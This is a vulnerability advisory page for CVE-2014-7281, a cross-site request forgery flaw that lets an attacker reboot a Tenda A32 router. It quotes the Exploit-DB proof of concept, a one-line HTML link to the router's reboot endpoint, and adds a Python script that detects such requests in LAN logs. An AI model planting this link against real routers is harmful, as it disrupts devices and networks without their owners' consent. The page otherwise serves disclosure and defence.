CVE-2014-7281
Description
Cross-site request forgery (CSRF) vulnerability in Shenzhen Tenda Technology Tenda A32 Router with firmware 5.07.53_CN allows remote attackers to hijack the authentication of administrators for requests that reboot the device via a request to goform/SysToolReboot.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Tenda A32 Router - Cross-Site Request Forgery
# Exploit Title: Tenda A32 Router CSRF Vulnerability (reboot the Router)
# CVE ID: CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
When the administrator is logged in and clicks on the link below, the device will reboot.
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>
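A detection check for the request described above, added here as an example and not part of the Exploit-DB entry or the vendor's code: it scans HTTP records from a LAN sensor and flags requests to goform/SysToolReboot whose Referer is absent or points at another site. The tab-separated record layout, the function names and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

ROUTER_HOSTS = {"192.168.2.1"}         # router address used in the PoC link
REBOOT_PATH = "/goform/SysToolReboot"  # endpoint named in the CVE description

# Constructed sample records (not real traffic), tab-separated:
# ts, client, method, host, uri, referrer ("-" means no Referer header)
SAMPLE_LOG = (
    "1412930000\t192.168.2.50\tGET\t192.168.2.1\t/goform/SysToolReboot\thttp://192.168.2.1/\n"
    "1412930060\t192.168.2.50\tGET\t192.168.2.1\t/goform/SysToolReboot\thttp://forum.example/thread?id=7\n"
    "1412930120\t192.168.2.51\tGET\t192.168.2.1\t/goform/SysToolReboot\t-\n"
    "1412930180\t192.168.2.50\tGET\t192.168.2.1\t/index.html\thttp://forum.example/\n"
    "1412930240\t192.168.2.50\tGET\t192.168.2.1:80\t/goform/SysToolReboot?x=1\thttp://mail.example/inbox\n"
)


def referer_verdict(referrer, router_hosts):
    """Return None for a same-site Referer, else the reason it is suspect."""
    if referrer in ("", "-"):
        return "no-referer"  # typed URL, stripped Referer, or non-browser client
    if urlsplit(referrer).hostname in router_hosts:
        return None  # request came from the router's own admin pages
    return "cross-site"  # another origin triggered the reboot request


def find_suspect_reboots(log_text, router_hosts=ROUTER_HOSTS):
    """List (ts, client, reason) for reboot requests not initiated from the admin UI."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 6:
            continue  # skip malformed records
        ts, client, _method, host, uri, referrer = fields
        if urlsplit("//" + host).hostname not in router_hosts:
            continue  # not addressed to the router (port stripped before compare)
        if urlsplit(uri).path != REBOOT_PATH:
            continue  # query string ignored; only the reboot endpoint matters
        reason = referer_verdict(referrer, router_hosts)
        if reason:
            findings.append((ts, client, reason))
    return findings


if __name__ == "__main__":
    for finding in find_suspect_reboots(SAMPLE_LOG):
        print(*finding)
```

A "no-referer" hit is weaker evidence than "cross-site", since browsers and privacy settings can omit the header on legitimate navigation.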
References
- http://osvdb.org/show/osvdb/113308
- http://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html
- http://www.exploit-db.com/exploits/34969
CWEs
CWE-352